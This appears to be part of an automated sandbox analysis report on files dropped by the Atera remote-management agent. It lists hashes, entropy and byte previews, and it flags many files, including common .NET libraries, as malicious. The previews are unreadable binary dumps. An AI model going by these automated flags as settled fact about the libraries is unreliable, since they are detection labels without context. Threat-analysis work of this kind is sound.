                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.674524887219165
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Hh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBr882HW:Hy9eEpYinAMxCAT2HW
                                                                                                                                                                                                                                                                                                                                  MD5:3D126403FBA7BC6FAC6E6ABF5FCE09E8
                                                                                                                                                                                                                                                                                                                                  SHA1:70B60D649EB174C109C0A6DC873444473D956694
                                                                                                                                                                                                                                                                                                                                  SHA-256:D2B815734C2683E7759DEEA3019FCD2B19F5B879CFA3BA02620619DBCAF73E38
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC0D56E79471051228DB678AC686BE96BEA6697C2376AE28574EDBAD52CF827AE720A7F733B6FE96B2757610771137B6E6A6CF86B787128136D17B232F09569D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................R.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.335679732582514
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCF:QnvXYcIh6yFIFBYpc47HxG
                                                                                                                                                                                                                                                                                                                                  MD5:14C4B9D7E63166E65ECCD9A74A55BC4A
                                                                                                                                                                                                                                                                                                                                  SHA1:C1F849748FBC76EC9BF9BF934135860242CE1928
                                                                                                                                                                                                                                                                                                                                  SHA-256:83BBFBEDA8EFB1745ECDDBEE0FB16ECAE1E6524461FE075B90C700E34C78498F
                                                                                                                                                                                                                                                                                                                                  SHA-512:C2774C72B62148FFFF05B2714F4720D212F52F740812D307D683D66709D77FD06F325A4DB25D952B9B2CCA5A1DD60CEDFCBFB6420FA5CE1A81B9D711395671A1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.95485496879401
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRY:67N1r9KGI04CCARLY
                                                                                                                                                                                                                                                                                                                                  MD5:B742B57BE990E57E0D079CFAF918E086
                                                                                                                                                                                                                                                                                                                                  SHA1:00652CB0AD4ABCE039397AF2308B2D6D251A2B09
                                                                                                                                                                                                                                                                                                                                  SHA-256:8929394DD35DBF2592AAE46E1063D38D782122F2A7F6A0248A754817E4394823
                                                                                                                                                                                                                                                                                                                                  SHA-512:2CD15A7F0626AD3BBA10431AEEFEDE1A195987BA609EC01A51083EEEF11DA516FF4D0678451372106A27A66E013A1012FB00E74CB4F4125C7F451559DE326908
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......4T....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3585766
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9999279847863685
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:XOzuWD7XM4OvRQW56YWuCrMXa7ANNBvlXWKCI:XauWD7cjGKWuyOr
                                                                                                                                                                                                                                                                                                                                  MD5:E010D1F614B1A830482D3DF4BA056F24
                                                                                                                                                                                                                                                                                                                                  SHA1:5873E22B8C51A808C06A3BBF425FCF02B2A80328
                                                                                                                                                                                                                                                                                                                                  SHA-256:98A98DD1DF25D31A01D47EAF4FA65D5F88BC0AD166F8F31D68F2994B4F739A9B
                                                                                                                                                                                                                                                                                                                                  SHA-512:727877929530E08062611868FD751D1B64E4C7D28C26B70F14C7CD942B1AE1579CBA2A2EF038BAD07032EF728AE277963FFB3E1AB7A5C28351326FABAD84DAA6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-......6>Y.^.S........1...AgentPackageMonitoring/AgentPackageMonitoring.exe....0........p........_L........v.w.../.E..l1.=.8..F.....|..%J.....QB..+.C#.(...Y..*FC.j./.?..#WJ.T......3.P....7^p5.g.`.. .m.h..U..(\.OlC.U...,...l~..Noh.q....Ai.'.EuZ..!z..5w4..&..4..b.__...7u..^.Wv.1.:.|....}..I....F..W..Ko]_j.mk..v..-....CW.....%x....&...o.:I.~.C..#%S..U...f$..n.........WE.....>...d...._M.|....(..?..i. Z.d......{..C.P....57.QR...._iN...r.t..IG..tFs..r.%..b.I.C......`Dd..8U.h..T.C..q....7.i.L..S!m"..).s."..H....W..b....X.l.C..'..#M....gB}k4..{K.&..s.<.^..Q....Q..c..&..BO..W.".\...!.CR..,o<.X>....,.-.[.^1H^r.)q. L..#.?...0..j.,r.`#..Rq"K/.B.:.....V...hX_..ja.........[.)&....C...../../......IZ2..v .@G...*F....nf. .@w.9o.,.....X.i.K/.}\!..7.a.w....:.x.$gE..DG..V...t...K...M.$...b..{.u.4..1..]."..o.n8dQ<...q.....d.(..Y...U...../n.....*y+..%.+.D.}W.&&.U.Z...c#.mU(.......d(.......x....r".g/O.....5..|(p..XG...'7].3.A.Y.&.&D$.".|...D..d\.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398384
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2554691460003795
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:OLrnDNjiDx+xdShTv/51LtpYbgPuXhN2sHY:OLcDx+72/51+cuXhN2Z
                                                                                                                                                                                                                                                                                                                                  MD5:5E3252E0248B484E76FCDBF8B42A645D
                                                                                                                                                                                                                                                                                                                                  SHA1:11AE92FD16AC87F6AB755911E85E263253C16516
                                                                                                                                                                                                                                                                                                                                  SHA-256:01F464FBB9B0BFD0E16D4AD6C5DE80F7AAD0F126E084D7F41FEF36BE6EC2FC8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:540D6B3CA9C01E3E09673601514AF701A41E7D024070DE1257249C3C077AC53852BD04AB4AC928A38C9C84F423A6A3A89AB0676501A9EDC28F95DE83818FB699
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../............"...0.............2.... ........@.. .......................@......<.....`.....................................O.......(...............0(... ......0...8............................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc....... ......................@..B........................H........0..d.............................................................{'...*..{(...*..{)...*r.(*.....}'.....}(.....})...*....0..Y........u........L.,G(+....{'....{'...o,...,/(-....{(....{(...o....,.(/....{)....{)...o0...*.*.*....0..K....... bHQ. )UU.Z(+....{'...o1...X )UU.Z(-....{(...o2...X )UU.Z(/....{)...o3...X*..0...........r...p......%..{'......%q.........-.&.+.......o4....%..{(......%q.........-.&.+.......o4....%..{)......%q.........-.&.+.......o4....(5...*..{6...*:.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1459
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                                                                                                                  MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                                                                                                                  SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                                                                                                                  SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhWQn:WZn
                                                                                                                                                                                                                                                                                                                                  MD5:5796D1F96BB31A9D07F4DB8AE9F0DDB3
                                                                                                                                                                                                                                                                                                                                  SHA1:93012724E6CC0A298838AEDE678806E6C0C6517D
                                                                                                                                                                                                                                                                                                                                  SHA-256:A90D255CCE3B419641FA0B9BA74D4DA464E0CE70638A9C2EBA03D6B34FCA1DC4
                                                                                                                                                                                                                                                                                                                                  SHA-512:890112DDCB3B92B739C0DD06721EFA81926CE3AAB04C55CDADB8C4E6B7A28C9796F08F508249DB189547DC4755804AA80CC8B104DD65C813A0450AAD2CDDA21C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=37.8

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):102448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190879178656762
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxm:g2bYbYSWd85I5sSakFQhHL8g
                                                                                                                                                                                                                                                                                                                                  MD5:A86884A9A1C75604B2114E09B738FCF9
                                                                                                                                                                                                                                                                                                                                  SHA1:A82B444BF09CFCAE36F532C4EB4B8C5EF0933F6A
                                                                                                                                                                                                                                                                                                                                  SHA-256:EEF751E3B01C4071A1BA34E96B663E93631C51485AF31055C3EB2F75866F9FEC
                                                                                                                                                                                                                                                                                                                                  SHA-512:4B97A3D4C37129440816D0524CDB1C485AE68B6C6735857C157D7EA76ADD91241B7185C831C646713CFB4DFB3EC95E577F98088D08ACBB0313837CA584474299
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.997149012234495
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:S4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87Hxsfn:S4auS7S5Ea6WMcpu8Mn
                                                                                                                                                                                                                                                                                                                                  MD5:0E5155ECBE5A1797644F1610DAA15583
                                                                                                                                                                                                                                                                                                                                  SHA1:89677E0F9443D52C73D4E0B91C5AEE5215EC4E88
                                                                                                                                                                                                                                                                                                                                  SHA-256:9BAF23C814DD100B2AC9511C9A2E5302DEE1FFB1807DEA021E1D317BA36901CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:3F80A871547BDF47F0A5B58F54B9597D0894580FCEE8F53DD08C8A80658697FA9C9426AB8D47A40B0CDCF53D11769C654D26A3B530AD39A3A6E37D468CA309D3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ..............................d.....`..................................`..O.......4............L..0(..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.240342116807372
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:bu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYM:iF+qo7mDEwj4NXLGcfgruFcg7HxRM7
                                                                                                                                                                                                                                                                                                                                  MD5:F64746D633211D129AEC5DB988BCC9B1
                                                                                                                                                                                                                                                                                                                                  SHA1:78E7047265B0DF15C54FE84261D2A0B3568FEF31
                                                                                                                                                                                                                                                                                                                                  SHA-256:9EC285FDB857D5618FBD794464135BC56823B08146EA41F24FCEC3135F0E1C0B
                                                                                                                                                                                                                                                                                                                                  SHA-512:31BCE8F3DC415F562354044BA490A9252E6C20CAA38D5162AB3929111566BCA7E97D609EACAC4712E814AA8AACFCB7B32360E4F6EE5521D6223DCC4617A5614F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`............`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.408313907878965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:RQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bMEpYinAMxCk15:R9MYPJS/16/E8/3A+++bF7Hx315
                                                                                                                                                                                                                                                                                                                                  MD5:1CAB625AAF9CBCAB46B1455BCA45EF4C
                                                                                                                                                                                                                                                                                                                                  SHA1:274A3B9134AA4530110F29C1858A85D86D4A396D
                                                                                                                                                                                                                                                                                                                                  SHA-256:1CB4C57049F47E3EEFB1C2BAB2BA34A17ABDA610DC3D4D331A9B33B40B00307F
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF4A53BFB9DCF13C87ED6E79640371908C73E7D67765B724C509B4EB7F3F66962F0883094640497CCD2FFCD255D1E46A50B33850E8B0B2D1CC684D40DE24F5D7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D............." ..0.............b.... ........... ....................................`.....................................O.......4...............0(..........$...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................B.......H.......|E...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):155184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.247374284901675
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:A0feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+YkY:1P80zukOltwW9
                                                                                                                                                                                                                                                                                                                                  MD5:12572F87CCF0E40406B3554A1A6D3905
                                                                                                                                                                                                                                                                                                                                  SHA1:C9E238EF065D38400D084265EE056B2ABB694224
                                                                                                                                                                                                                                                                                                                                  SHA-256:6FDB589EBADF91A869EAA3A850B0FB17A8AB96BED78422E28F7EFAF63BC040F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:D397888AACB1B787662B1678A24E24DDFA7A42C5363AC673706934A1A42E13F5ED55956D478FAF0998C77891A64F5F26E85DCFA7FFC0A6AE87DF26B3C24C4314
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%%.W.........." ..0..............M... ...`....... ....................................@.................................lM..O....`...............6..0(..........4L............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............4..............@..B.................M......H.......d....G...........................................................0...........u....,..s....*.........*Z.(....u-...%-.&*o....*..{....*..{....*..{....*..{....*..{....*2.(....._...*2.(....._...*..{....*2.(....._...*...}......}......}.......}.......}.......}.......}....*>.........}....*..{....*...0...........o].....o^...(....%-.&+..o_....(....,...(....o`.....(....oa....(.......(b...,...(.......(c...od...+"(.......(b...,..(.......(c...od....(.......(e...,...(.......(f...og.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215088
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.030878409231256
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:x1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sA:YIzm6pOIgvr75
                                                                                                                                                                                                                                                                                                                                  MD5:44EBFB8CE52A4EFEDF07DA6875CA230E
                                                                                                                                                                                                                                                                                                                                  SHA1:824585DB12A35588F25C0CC5DA77EAEF94011CAD
                                                                                                                                                                                                                                                                                                                                  SHA-256:292F94823959CAFAAA77B81C0A490EA9ACF90B2553727BF3E74C1AE3A7F8AC01
                                                                                                                                                                                                                                                                                                                                  SHA-512:89DD6F5E827A9E23A8F7DBA8F89F55F2A01B290756AE7A6371A5934E9AFC6B3C5702DC0CADAB061405AEA4F2AC275902D8094E7A0ECDA29C8A438C6BCE46ABD0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
